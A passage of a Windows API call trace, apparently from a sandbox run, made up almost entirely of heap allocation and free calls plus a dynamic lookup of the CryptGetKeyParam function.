(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0187.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.051] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0187.052] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.053] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.053] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0187.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0187.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0187.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0187.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.059] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0187.059] HeapFree (in: 